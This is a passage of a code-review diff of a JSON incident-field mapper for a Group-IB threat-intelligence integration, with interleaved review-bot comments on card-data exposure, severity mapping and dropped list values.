"simple": "" + } }, "GIB Date Compromised": { "complex": { - "accessor": "", "filters": [], "root": "dateCompromised", "transformers": [] - }, - "simple": "" + } }, "GIB Date of Detection": { "complex": { - "accessor": "", "filters": [], "root": "dateDetected", "transformers": [] - }, - "simple": "" - }, - "GIB Drop Email": { - "complex": { - "accessor": "email", - "filters": [], - "root": "dropEmail", - "transformers": [] - }, - "simple": "" - }, - "GIB Drop Email Domain": { - "complex": { - "accessor": "domain", - "filters": [], - "root": "dropEmail", - "transformers": [] - }, - "simple": "" + } }, "GIB Email": { "complex": { "accessor": "email", "filters": [], - "root": "person", + "root": "owner", "transformers": [] - }, - "simple": "" + } }, "GIB ID": { "complex": { - "accessor": "", "filters": [], "root": "id", "transformers": [] - }, - "simple": "" + } }, "GIB Malware Name": { "complex": { 
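Review bot: `GIB Card Number` and `GIB CVV` in the rewritten `GIB Compromised Card` block are mapped straight from `cardInfo.number` and `cardInfo.cvv` with an empty `transformers` list; if the feed delivers the full PAN and CVV, this stores cardholder data in searchable incident fields. The old `GIB Compromised Card` block removed further down did the same, so this is carried over rather than introduced, but since the block is being rewritten this is the place to either mask the value with a transformer or confirm the feed already truncates it. The enclosing `GIB Compromised Card` mapping continues past the end of this hunk.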
@@ -573,44 +277,37 @@ "filters": [], "root": "malware", "transformers": [] - }, - "simple": "" + } }, - "GIB Password": { + "GIB Payment System": { "complex": { - "accessor": "", + "accessor": "system", "filters": [], - "root": "password", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, "GIB Person": { "complex": { "accessor": "name", "filters": [], - "root": "person", + "root": "owner", "transformers": [] - }, - "simple": "" + } }, "GIB Portal Link": { "complex": { - "accessor": "", "filters": [], "root": "portalLink", "transformers": [] - }, - "simple": "" + } }, "GIB Related Indicators Data": { "complex": { - "accessor": "", "filters": [], "root": "relatedIndicatorsData", "transformers": [] - }, - "simple": "" + } }, "GIB Severity": { "complex": { @@ -618,17 +315,14 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Source": { "complex": { - "accessor": "", "filters": [], "root": "sourceType", "transformers": [] - }, - "simple": "" + } }, "GIB Threat Actor ID": { "complex": { @@ -636,8 +330,7 @@ "filters": [], "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, "GIB Threat Actor Name": { "complex": { @@ -645,8 +338,7 @@ "filters": [], "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, "GIB Threat Actor is APT": { "complex": { 
@@ -654,265 +346,23 @@ "filters": [], "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Victim IP": { - "complex": { - "accessor": "ip", - "filters": [], - "root": "client.ipv4", - "transformers": [] - }, - "simple": "" - }, - "Phone Number": { + "Phone Number": { "complex": { "accessor": "phone", "filters": [], - "root": "person", - "transformers": [] - }, - "simple": "" - }, - "severity": { - "complex": { - "accessor": "", - "filters": [], - "root": "systemSeverity", - "transformers": [] - }, - "simple": "" - }, - "GIB Admiralty Code": { - "complex": { - "accessor": "admiraltyCode", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - }, - "GIB Credibility": { - "complex": { - "accessor": "credibility", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - }, - "GIB Reliability": { - "complex": { - "accessor": "reliability", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - } - } - }, - "GIB Compromised Card": { - "dontMapEventToLabels": true, - "internalMapping": { - "GIB Address": { - "complex": { - "accessor": "address", - "filters": [], - "root": "owner", - "transformers": [] - }, - "simple": "" - }, - "GIB CVV": { - "complex": { - "accessor": "cvv", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Issuer": { - "complex": { - "accessor": "issuer", - "filters": [], - "root": "cardInfo.issuer", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Number": { - "complex": { - "accessor": "number", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Type": { - "complex": { - "accessor": "type", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Card Valid Thru": { - "complex": { - "accessor": "validThru", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Date 
Compromised": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateCompromised", - "transformers": [] - }, - "simple": "" - }, - "GIB Date of Detection": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateDetected", - "transformers": [] - }, - "simple": "" - }, - "GIB Email": { - "complex": { - "accessor": "email", - "filters": [], - "root": "owner", - "transformers": [] - }, - "simple": "" - }, - "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" - }, - "GIB Malware Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "malware", - "transformers": [] - }, - "simple": "" - }, - "GIB Payment System": { - "complex": { - "accessor": "system", - "filters": [], - "root": "cardInfo", - "transformers": [] - }, - "simple": "" - }, - "GIB Person": { - "complex": { - "accessor": "name", - "filters": [], "root": "owner", "transformers": [] - }, - "simple": "" - }, - "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" - }, - "GIB Related Indicators Data": { - "complex": { - "accessor": "", - "filters": [], - "root": "relatedIndicatorsData", - "transformers": [] - }, - "simple": "" + } }, - "GIB Severity": { + "severity": { "complex": { "accessor": "severity", "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" - }, - "GIB Source": { - "complex": { - "accessor": "", - "filters": [], - "root": "sourceType", - "transformers": [] - }, - "simple": "" - }, - "GIB Threat Actor ID": { - "complex": { - "accessor": "id", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" - }, - "GIB Threat Actor Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" - }, - "GIB Threat Actor is APT": { - "complex": { - "accessor": "isAPT", - "filters": [], - "root": 
"threatActor", - "transformers": [] - }, - "simple": "" - }, - "Phone Number": { - "complex": { - "accessor": "phone", - "filters": [], - "root": "owner", - "transformers": [] - }, - "simple": "" - }, - "severity": { - "complex": { - "accessor": "", - "filters": [], - "root": "systemSeverity", - "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -920,8 +370,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -929,8 +378,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { @@ -938,8 +386,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } } } }, @@ -948,16 +395,13 @@ "internalMapping": { "GIB Email": { "complex": { - "accessor": "", "filters": [], "root": "email", "transformers": [ { "args": { "separator": { - "isContext": false, "value": { - "complex": null, "simple": ", " } } @@ -965,39 +409,23 @@ "operator": "join" } ] - }, - "simple": "" + } }, "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" + "simple": "id" }, "GIB Leak Name": { - "complex": { - "accessor": "", - "filters": [], - "root": "leakName", - "transformers": [] - }, - "simple": "" + "simple": "leakName" }, "GIB Password": { "complex": { - "accessor": "", "filters": [], "root": "password", "transformers": [ { "args": { "separator": { - "isContext": false, "value": { - "complex": null, "simple": ", " } } 
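Review bot: In the rewritten `GIB Compromised Card` block the system `severity` field is now fed from `evaluation.severity` (accessor `severity`, root `evaluation`), whereas the removed lines in the same hunk mapped it from `systemSeverity` and the `GIB Compromised Account` block in the first hunk still does; the block also keeps a separate `GIB Severity` entry reading the same `evaluation.severity`, so the two now duplicate each other. If `systemSeverity` is the value the integration precomputes on the platform's own severity scale, card incidents would instead receive the vendor's severity string and may end up unset or mis-ranked. The previous mapping, `"severity": { "complex": { "filters": [], "root": "systemSeverity", "transformers": [] } }`, looks like the intended one.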
@@ -1005,53 +433,72 @@ "operator": "join" } ] - }, - "simple": "" + } }, "GIB Severity": { - "complex": { - "accessor": "severity", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" + "simple": "evaluation.severity" }, "severity": { - "complex": { - "accessor": "", - "filters": [], - "root": "systemSeverity", - "transformers": [] - }, - "simple": "" + "simple": "systemSeverity" }, "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "Country": { "complex": { - "accessor": "admiraltyCode", + "accessor": "[0]", "filters": [], - "root": "evaluation", + "root": "countries", "transformers": [] - }, - "simple": "" + } }, - "GIB Credibility": { + "Description": { + "simple": "description" + }, + "GIB Email Domains": { + "simple": "emailDomains" + }, + "GIB Emails": { + "simple": "emails" + }, + "GIB Leak Published": { + "simple": "leakPublished" + }, + "GIB Passwords": { + "simple": "passwords" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Update Time": { + "simple": "updateTime" + }, + "GIB Upload Time": { + "simple": "uploadTime" + }, + "Target": { "complex": { - "accessor": "credibility", + "accessor": "[0]", "filters": [], - "root": "evaluation", + "root": "targetedCompany", "transformers": [] - }, - "simple": "" + } }, - "GIB Reliability": { + "name": { "complex": { - "accessor": "reliability", "filters": [], - "root": "evaluation", + "root": "title", "transformers": [] - }, - "simple": "" + } } } }, 
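Review bot: `Country` and `Target` in the `GIB Data Breach` block use accessor `[0]` over `countries` and `targetedCompany`, so only the first element of each list reaches the incident and any further countries or targeted companies in the breach record are dropped silently. If the target fields are single-valued, a `join` transformer like the one already used for `GIB Email` and `GIB Password` in this block would keep the whole list; if they are multi-select fields the accessor can be removed altogether. A second, stylistic point: this block now mixes the `"simple": "path"` shorthand (`GIB ID`, `GIB Leak Name`, `GIB Severity`, …) with the full `complex` form for mappings that have no filters or transformers (`name` over `title`, `Country`, `Target`), while the other incident types in this file stay on `complex` throughout; one form per file keeps the mapper diffable.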
@@ -1060,57 +507,27 @@ "internalMapping": { "GIB Date of Detection": { "complex": { - "accessor": "", "filters": [], "root": "dateDetected", "transformers": [] - }, - "simple": "" + } }, "GIB ID": { "complex": { - "accessor": "", "filters": [], "root": "id", "transformers": [] - }, - "simple": "" + } }, "GIB Leaked File Name": { "complex": { - "accessor": "", "filters": [], - "root": "name", + "root": "leaked_file_name", "transformers": [] - }, - "simple": "" + } }, "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "file", - "transformers": [] - }, - "simple": "" - }, - "GIB Repository": { - "complex": { - "accessor": "", - "filters": [], - "root": "repository", - "transformers": [] - }, - "simple": "" - }, - "GIB Revisions": { - "complex": { - "accessor": "", - "filters": [], - "root": "revisions", - "transformers": [] - }, - "simple": "" + "simple": "portalLink" }, "GIB Severity": { "complex": { @@ -1118,26 +535,21 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Source": { "complex": { - "accessor": "", "filters": [], - "root": "source", + "root": "sourceType", "transformers": [] - }, - "simple": "" + } }, "severity": { "complex": { - "accessor": "", "filters": [], "root": "systemSeverity", "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -1145,8 +557,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -1154,8 +565,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { @@ -1163,8 +573,19 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } + }, + "GIB Date Created": { + "simple": "dateCreated" + }, + "GIB GIT Source": { + "simple": "source" + }, + "GIB OSI Git Repository Files Table": { + "simple": "files" + }, + "GIB Related Indicators Data": { + "simple": "indicators" } } }, 
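Review bot: `GIB Source` changes meaning for `GIB OSI Git Leak` in this line's hunks — its root moves from `source` to `sourceType`, while the old git `source` value is re-homed under the new `GIB GIT Source` field in the last hunk. Any saved search, dashboard or playbook condition that keys on `GIB Source` values for this type will silently start matching the collection name instead of the repository source; that deserves a release-note line and a check of the pack's own playbooks. The renamed roots (`name`→`leaked_file_name`, `file`→`portalLink`, `source`→`sourceType`) only populate anything if the integration's fetch emits exactly those keys, and a mapper key missing from the event leaves the field empty with no error, so a test-data sample for this type should exercise them. `GIB Repository` and `GIB Revisions` are dropped with no visible replacement other than the `files` table; if the `GIB OSI Git Leak` layout still shows those fields they will now be blank.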
@@ -1173,66 +594,34 @@ "internalMapping": { "GIB Data Hash": { "complex": { - "accessor": "", "filters": [], "root": "hash", "transformers": [] - }, - "simple": "" + } }, "GIB Date Created": { "complex": { - "accessor": "", "filters": [], "root": "created", "transformers": [] - }, - "simple": "" + } }, "GIB ID": { "complex": { - "accessor": "", "filters": [], "root": "id", "transformers": [] - }, - "simple": "" + } }, "GIB Leaked Data": { "complex": { - "accessor": "", "filters": [], "root": "data", "transformers": [] - }, - "simple": "" - }, - "GIB Link List": { - "complex": { - "accessor": "", - "filters": [], - "root": "linkList", - "transformers": [] - }, - "simple": "" - }, - "GIB Matches": { - "complex": { - "accessor": "", - "filters": [], - "root": "matches", - "transformers": [] - }, - "simple": "" + } }, "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" + "simple": "portalLink" }, "GIB Severity": { "complex": { @@ -1240,17 +629,14 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "severity": { "complex": { - "accessor": "", "filters": [], "root": "systemSeverity", "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -1258,8 +644,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -1267,8 +652,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { 
@@ -1276,167 +660,1342 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } + }, + "GIB Link List Table": { + "simple": "linkList" + }, + "GIB Matches Table": { + "simple": "matches" + }, + "GIB Source": { + "simple": "sourceType" } } }, - "GIB Targeted Malware": { + "dbot_classification_incident_type_all": { "dontMapEventToLabels": true, + "internalMapping": {} + }, + "GIB Attacks DDOS": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB CNC": { + "simple": "cnc.cnc" + }, + "GIB CNC Domain": { + "simple": "cnc.domain" + }, + "GIB CNC Port": { + "simple": "cnc.port" + }, + "GIB CNC URL": { + "simple": "cnc.url" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB DDOS Date Begin": { + "simple": "dateBegin" + }, + "GIB DDOS Date End": { + "simple": "dateEnd" + }, + "GIB DDOS Date Registration": { + "simple": "dateReg" + }, + "GIB DDOS Duration": { + "simple": "duration" + }, + "GIB DDOS Protocol": { + "simple": "protocol" + }, + "GIB DDOS Request Body": { + "simple": "requestData.body" + }, + "GIB DDOS Request Body Hash": { + "simple": "requestData.bodyHash" + }, + "GIB DDOS Request Data Link": { + "simple": "requestData.link" + }, + "GIB DDOS Request Headers Hash": { + "simple": "requestData.headersHash" + }, + "GIB DDOS Source": { + "simple": "source" + }, + "GIB DDOS Target ASN": { + "simple": "target.asn" + }, + "GIB DDOS Target Category": { + "simple": "target.category" + }, + "GIB DDOS Target City": { + "simple": "target.city" + }, + "GIB DDOS Target Country Code": { + "simple": "target.countryCode" + }, + "GIB DDOS Target Country Name": { + "simple": "target.countryName" + }, + "GIB DDOS Target Domain": { + "simple": "target.domain" + }, + "GIB DDOS Target IP": { + "simple": "target.ip" + }, + "GIB DDOS Target Port": { + "simple": "target.port" + }, + "GIB DDOS Target Provider": { + "simple": "target.provider" + }, + "GIB 
DDOS Target Region": { + "simple": "target.region" + }, + "GIB DDOS Target URL": { + "simple": "target.url" + }, + "GIB DDOS Type": { + "simple": "type" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware Name": { + "simple": "malwareName" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Attacks Deface": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Country Code": { + "simple": "targetIp.countryCode" + }, + "GIB Country Name": { + "simple": "targetIp.countryName" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Deface Contacts": { + "simple": "contacts" + }, + "GIB Deface Date": { + "simple": "date" + }, + "GIB Deface Site URL": { + "simple": "siteUrl" + }, + "GIB Deface Source": { + "simple": "source" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Mirror Link": { + "simple": "mirrorLink" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Provider Domain": { + "simple": "providerDomain" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Target ASN": { + "simple": "targetIp.asn" + }, + "GIB Target City": { + "simple": "targetIp.city" + }, + "GIB Target Domain": { + "simple": "targetDomain" + }, + "GIB Target Domain Provider": { + "simple": 
"targetDomainProvider" + }, + "GIB Target IP": { + "simple": "targetIp.ip" + }, + "GIB Target Provider": { + "simple": "targetIp.provider" + }, + "GIB Target Region": { + "simple": "targetIp.region" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Attacks Phishing Group": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Country Name": { + "simple": "phishing_ip.countryName" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Phishing Brand": { + "simple": "brand" + }, + "GIB Phishing Date Added": { + "simple": "added" + }, + "GIB Phishing Date Blocked": { + "simple": "blocked" + }, + "GIB Phishing Date Detected": { + "simple": "detected" + }, + "GIB Phishing Date Updated": { + "simple": "updated" + }, + "GIB Phishing Domain": { + "simple": "domainInfo.domain" + }, + "GIB Phishing Domain Expiration Date": { + "simple": "domainInfo.expirationDate" + }, + "GIB Phishing Domain Puny": { + "simple": "domainInfo.domainPuny" + }, + "GIB Phishing IP Table": { + "simple": "phishing_ip" + }, + "GIB Phishing Kit Source": { + "simple": "source" + }, + "GIB Phishing Kit Table": { + "simple": "phishing_kit_table" + }, + "GIB Phishing Objectives": { + "simple": "objective" + }, + "GIB Phishing Registrar": { + "simple": "domainInfo.registrar" + }, + "GIB Phishing Sources": { + "simple": "source" + }, + "GIB Phishing URLs": { + "simple": "phishing_urls" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": 
"evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Attacks Phishing Kit": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Data Hash": { + "simple": "hash" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "dateDetected" + }, + "GIB Downloaded From Table": { + "simple": "downloadedFrom" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Phishing Kit Email": { + "simple": "emails" + }, + "GIB Phishing Kit Source": { + "simple": "source" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Compromised Account Group": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Address": { + "simple": "person.address" + }, + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Compromised Events Information Table": { + "simple": "events_table" + }, + "GIB Compromised Login": { + "simple": "login" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Compromised": { + "simple": "dateFirstCompromised" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Compromised": { + "simple": "dateLastCompromised" + }, + "GIB Date Last Seen": { + "simple": 
"dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "person.dateDetected" + }, + "GIB Email": { + "simple": "person.email" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Parsed Login Domain": { + "simple": "parsedLogin.domain" + }, + "GIB Parsed Login IP": { + "simple": "parsedLogin.ip" + }, + "GIB Password": { + "simple": "password" + }, + "GIB Person": { + "simple": "person.name" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Service Domain": { + "simple": "service.domain" + }, + "GIB Service IP": { + "simple": "service.ip" + }, + "GIB Service URL": { + "simple": "service.url" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "Phone Number": { + "simple": "person.phone" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Compromised Card Group": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Address": { + "simple": "address" + }, + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB CVV": { + "simple": "cvv" + }, + "GIB Card Issuer": { + "simple": "issuer" + }, + "GIB Card Number": { + "simple": "number" + }, + "GIB Card Type": { + "simple": "type" + }, + "GIB Card Valid Thru": { + "simple": "validThru" + }, + "GIB Compromised Events Table": { + "simple": "compromised_events" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Compromised": { + "simple": "dateFirstCompromised" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Compromised": { + "simple": "dateLastCompromised" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Email": { + "simple": "email" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware Table": { + "simple": "malware" + }, + "GIB Payment System": { + "simple": "payment_system" + 
}, + "GIB Person": { + "simple": "owner_name" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actors Table": { + "simple": "threatActor" + }, + "Phone Number": { + "simple": "phone" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Compromised Mule": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Compromised Account": { + "simple": "account" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Data Hash": { + "simple": "hash" + }, + "GIB Date Add": { + "simple": "dateAdd" + }, + "GIB Date Incident": { + "simple": "dateIncident" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Organization BIC": { + "simple": "organization.bic" + }, + "GIB Organization BSB": { + "simple": "organization.bsb" + }, + "GIB Organization CLABE": { + "simple": "organization.clabe" + }, + "GIB Organization IBAN": { + "simple": "organization.iban" + }, + "GIB Organization Name": { + "simple": "organization.name" + }, + "GIB Organization SWIFT": { + "simple": "organization.swift" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Cybercriminal Threat": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Cybercriminal Expertises": { + "simple": "expertise" + }, 
+ "GIB Cybercriminal Forums Table": { + "simple": "forumsAccounts" + }, + "GIB Cybercriminal Regions": { + "simple": "regions" + }, + "GIB Cybercriminal Sectors": { + "simple": "sectors" + }, + "GIB Cybercriminal Threat Description": { + "simple": "description" + }, + "GIB Cybercriminal Threat Title": { + "simple": "title" + }, + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Is Tailored": { + "simple": "isTailored" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Report Number": { + "simple": "reportNumber" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Country": { + "simple": "threatActor.country" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": "threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Cybercriminal Threat Actor": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Cybercriminal Expertises": { + "simple": "expertise" + }, + "GIB Cybercriminal Malware": { + "simple": "malware" + }, + "GIB Cybercriminal Regions": { + "simple": "regions" + }, + "GIB Cybercriminal Sectors": { + "simple": "sectors" + }, + "GIB Cybercriminal Threat Actor Aliases": { + "simple": "aliases" + }, + "GIB Cybercriminal Threat Actor Description": { + "simple": "description" + }, + "GIB Cybercriminal Threat Actor Reports Table": { + "simple": "reports" + }, + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": 
"dateLastSeen" + }, + "GIB Date Updated At": { + "simple": "updatedAt" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Name": { + "simple": "threat_actor_name" + }, + "GIB Threat Actor is APT": { + "simple": "isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Malware": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Date Updated At": { + "simple": "updatedAt" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware Aliases": { + "simple": "aliases" + }, + "GIB Malware Categories": { + "simple": "category" + }, + "GIB Malware Description": { + "simple": "description" + }, + "GIB Malware Langs": { + "simple": "langs" + }, + "GIB Malware Name": { + "simple": "malware_name" + }, + "GIB Malware Platforms": { + "simple": "platform" + }, + "GIB Malware Regions": { + "simple": "geoRegion" + }, + "GIB Malware Short Description": { + "simple": "shortDescription" + }, + "GIB Malware Source Countries": { + "simple": "sourceCountry" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor ID": { + "simple": "taList.id" + }, + "GIB Threat Actor Name": { + "simple": "taList.name" + }, + "GIB Threat Actors Table": { + "simple": "taList" + }, + "GIB Threat Level": { + "simple": "threatLevel" + } + } + }, + "GIB Malware CNC": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB CNC URL": { + "simple": "cnc" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "dateDetected" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Malware CNC Domain": { + "simple": "domain" + }, + "GIB Malware Table": { + "simple": "malwareList" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB 
